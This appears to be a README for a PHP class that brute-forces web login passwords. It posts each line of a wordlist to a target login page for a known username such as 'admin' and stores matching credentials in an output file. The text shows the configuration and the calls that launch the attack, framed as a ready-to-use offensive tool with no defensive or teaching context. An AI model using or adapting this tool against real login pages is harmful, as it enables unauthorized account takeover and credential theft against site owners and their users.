With this PHP class, you can brute-force a login with a wordlist.
You specify a wordlist to use and it will send a POST request for each line of the wordlist. It can only be used for brute-forcing passwords, so you have to know the username of an account. This uses cURL.
require 'app\bruteforce.class.php'; // Require in the Brute Force class
'url' => 'http://target.com/login.php', // Login page to attack.
'username' => 'username', // The username in the POST request.
'password' => 'password', // The password in the POST request.
'adminname' => 'admin', // So as I said, this class can only brute-force passwords. So you have to specify a username, here you must specify the username.
'wordlist' => 'wordlist/wordlist.txt', // Path to the wordlist.
'failcontent' => 'Error', // Content of page when logging in fails.
'outputfile' => 'output/output.txt', // Path to the output file, here will the matching combo('s) be stored.
'timezone' => 'Europe/Amsterdam' // Timezone.
$bf = new BruteForce(); // Instanciate the class.
$bf->attack(); // BOOM! ATTACK!
For a better example, take a look in the "example" directory.